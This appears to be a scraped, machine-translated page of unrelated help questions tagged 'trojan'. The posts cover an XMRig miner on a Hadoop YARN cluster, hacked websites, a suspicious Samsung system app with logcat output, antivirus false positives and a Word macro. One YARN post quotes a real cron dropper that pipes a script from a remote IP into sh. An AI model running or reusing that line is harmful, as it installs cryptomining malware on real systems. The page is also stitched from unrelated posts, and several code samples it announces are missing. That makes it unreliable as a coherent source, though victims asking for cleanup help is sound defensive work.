问题标签 [trojan]

每次启动纱线时，我都会发现一个无法完成的任务请求，但我无法获得任何有关它的日志，也没有发现任何错误。我在名为launch_container.sh的临时目录中找到了一个文件，如下所示：

我发现它会从网站下载一些东西，并且我已经将我的计算机从 ubuntu 重新安装到 centos，但这个问题仍然存在，尽管我在其他计算机上找不到同样的问题。这个问题到底是正常的东西还是木马？请提供一些有关如何解决此问题的提示，谢谢。与本站“ http://ist-deacuna-s1.syr.edu:8088/cluster/apps ”相同

这种情况是我关闭wget的端口后产生的，当我打开wget的端口时，会添加jps看不到的session，只能通过commmand观察

这两个会话总是占用我所有的 cpu。

感染了 XMrig 木马的 HDP 堆栈纱线处理器，即使我使用 kylo ex2 沙箱，我也会得到这个占用 100% CPU 的木马。

纱线) CMD (wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1)

这是一个 cron，由 yarn 用户运行并生成文件并加载到服务器上

试图找到根文件。任何帮助表示赞赏

我写是因为我不知道如何解决这个问题。在实践中，我有一些网站，其中大多数都存在身份不明的病毒感染问题，导致网站被黑客入侵。黑客包括将 .php 文件插入某些文件夹和编辑文件

• 索引.php
• .htaccess

然后对serp产生影响（带有中文字符的持久文件等）。

经过几次尝试并在主机商的支持下，我设法清理了大部分站点，而其他站点则无法清理。在主机确认其余站点是干净的之后，经过扫描，我们得出结论，上述文件的更改来源可以直接从我的电脑开始。所以我想到了一些隐藏在某处或某处的键盘记录器。所以我使用以下工具安装并运行扫描：

• NOD32
• 恶意软件字节
• 威力
• Zbot木马
• 泽马纳反伐木工

每个人都找到了及时清理的东西，但仍然没有解决问题。

我还至少更换了几次 FTP 密码，但没有任何结果。几个小时后，这两个文件的修改立即重新出现。

这是插入 .htacess 的行

我无法报告注入 index.php 标头的代码，因为它太长了。我需要帮助，或者至少需要一条轨道来工作。

谢谢

在我的三星 Galaxy S6 手机上，当我单击显示系统应用程序时，我在设置 > 应用程序中看到 service.odtcfactory.sec.com.odtcfactoryservice。不久前，我开始怀疑我的手机可能被黑客入侵了，当我连接到它时，我注意到在 Phone\Android\data 中有一个名为 service.odtcfactory.sec.com.odtcfactoryservice 的文件夹，该文件夹是在入侵可能发生的时候创建的已经发生（事后看来）。

在此文件夹内有一个空缓存文件夹，该文件夹的创建和修改日期时间与以下行相同，其中包含 adb logcat 输出中的字符串“odtc”：

07-15 16:12:44.502 D/MountService（3663）：getExternalStorageMountMode：最终 mountMode=1，uid：1000，packageName：service.odtcfactory.sec.com.odtcfactoryservice
07-15 16:12:44.541 I/ActivityManager（3663 ): 启动 proc 5087:service.odtcfactory.sec.com.odtcfactoryservice/1000 广播 service.odtcfactory.sec.com.odtcfactoryservice/.odtcfactory.BatteryAlarmReceiver
07-15 16:12:44.561 I/SELinux (5087): SELinux: seaapp_context_lookup: seinfo=platform, pkgname=service.odtcfactory.sec.com.odtcfactoryservice
07-15 16:12:44.608 I/ActivityManager(3663): DSS on for service.odtcfactory.sec.com.odtcfactoryservice 和规模是 1.0
07- 15 16:12:44.644 D/ODTCFactoryService:BatteryAlarmReceiver(5087): ACTION_POWER_CONNECTED 收到
07-15 16:12:44.648 W/ContextImpl（5087）：在没有合格用户的情况下调用系统进程中的方法：android.app.ContextImpl.sendBroadcast:906 android.content.ContextWrapper.sendBroadcast:452 android.content.ContextWrapper .sendBroadcast:452 service.odtcfactory.sec.com.odtcfactoryservice.odtcfactory.BatteryAlarmReceiver.onReceive:54 android.app.ActivityThread.handleReceiver:3309
07-15 16:12:45.067 I/ODTCFactoryService:AlarmReceiver(5087): 收到警报
07 -15 16:12:45.071 D/ODTCFactoryService:AlarmReceiver(5087)：计划在 1800000 (ms) 之后发出警报，会话时间为 180000 (ms)
07-15 16:12:45.071 D/ODTCFactoryService:PowerMonitor(5087): sessionStartTime 1531696365071
07-15 16:12:45.073 W/ContextImpl(5087): 在没有合格用户的情况下调用系统进程中的方法: android.app.ContextImpl.startService:1403 android.content.ContextWrapper.startService:664 android.content.ContextWrapper .startService:664 service.odtcfactory.sec.com.odtcfactoryservice.odtcfactory.AlarmReceiver.onReceive:105 android.app.ActivityThread.handleReceiver:3309
07-15 16:12:45.078 D/ODTCFactoryService::LockscreenEncoderFactory(5087): LockscreenEncoderFactory 实例化
07-15 16:12:45.094 D/ODTCFactoryService:ProcessLockManager(5087): 锁被释放
07-15 16:12:45.105 I/ActivityManager(3663): Process service.odtcfactory.sec.com.odtcfactoryservice (pid 5087) 已经死亡(54,1194)

我已强制停止此应用程序并重新启动。本周我还两次将手机恢复出厂设置，但该应用程序仍然存在。第一次恢复出厂设置后，我安装了最新的系统更新，所以我的 Android 版本是 7.0：

内核版本 3.10.61-13731302 Mon Jun 和 4 2018内部版本
号 NRD90M.G920W8VLU6DRF1
Android 安全补丁级别 2018 年 6 月 1 日

这个系统应用合法吗？我在谷歌搜索中找不到太多关于它的信息，这让我更加怀疑。如果它无效，我该如何卸载它？我尝试运行以下命令，但得到了 DELETE_FAILED_INTERNAL_ERROR。
adb shell pm uninstall service.odtcfactory.sec.com.odtcfactoryservice

我还在与 reSIProcate 服务相关的日志文件中看到了其他看似可疑的活动。以下行是一个示例，但有许多类似的例子，就像我的手机向服务器发送消息一样。
07-15 15:51:08.226 I/reSIProcate(3132): SipResp: 200 tid=68e64ae9ac9d2c9f cseq=29 注册联系人=xxxx@[2605:8d80:2:8c1c:d6a:ab6e:8708:44c4]:6100 / 29从（电线）

我使用 C# 创建/更新了一个安装应用程序，它将文件安装到用户的 AppData/Roaming 文件夹中。此安装程序从服务器加载和读取 XML 文件，然后通过 HTTP 协议将文件从该服务器复制到本地计算机。

由于最新的修改是最小的（仅更改了要复制的 XML 和文件所在的服务器地址/它只是一个字符串常量），当用户尝试下载可执行安装程序时，几个病毒扫描程序会报告不同的木马. 安装程序中的 URL 指向最近注册的 .de 域，该域肯定不在任何黑名单或类似的列表中。

当然，开发环境很干净，可执行安装程序根本没有受到感染。来自扫描仪（例如“Windows Defender”、“Kaspersky”等）的警告仅在下载过程中出现，其他一些扫描仪无论如何只报告一个干净的文件。在这些扫描程序将可执行文件存储在隔离区并重新扫描后，它们都不会在此文件中发现任何木马或病毒。

我怎样才能避免这种虚假信息，任何人都有想法？

我的另一半收到了一个 MS word VBA 恶意软件。该文档已打开，启用了编辑功能，但由于某种原因，防病毒软件遗漏了该木马。

我 99% 确定系统已被清理并且没有持久影响，但是我想了解代码试图做什么，所以我可以 100% 确定。

我设法翻译的东西超出了我的技能。

这是来自 VBA 的原始函数：

当我尝试在不使用 HTTPS 的情况下访问每个站点时。我从 avast 收到一个弹出窗口，告诉我他们已阻止它。

它说'JS：Miner-AI [PUP]'。当我尝试访问 google.com（没有 https）时，它也会发生。

我尝试了以下方法：

使用 Avast、adaware 和 Malwarebytes 进行扫描（用于删除以前版本的 js:miner）

有人对我可以做些什么来删除它有任何建议吗？

我implementation 'android.arch.lifecycle:extensions:1.1.1'在我的项目中使用。

当我构建发布或调试 apk 并从 apk 中打开 AndroidManifest.xml 时，

我看到这条线。

我应该担心吗？

我也在 build->intermediates->instant_app_manifest_debug->AndroidManifest.xml 中看到了这一点

我最近开始学习 C。一切都很好，但突然间，当我尝试使用 CodeBlocks Windows Defender 的 2d 数组时，不断显示我编译的文件是 "Trojan:Win32/Fuerboos.C!cl" 。该怎么办？请提供任何帮助

除了 MinGW 和最新的 CodeBlocks，我没有安装任何东西

When I am trying to converting my python file into executable and binding with pdf with using command add-data. My pdf file is store no where due to this I cannot open my pdf file while opening executable.(yes, but command will create executable properly but there storing of pdf in default temp directory).

command:

P.s:- I tried to popen my file through my code but pdf is storing nowhere so, I cannot execute popen command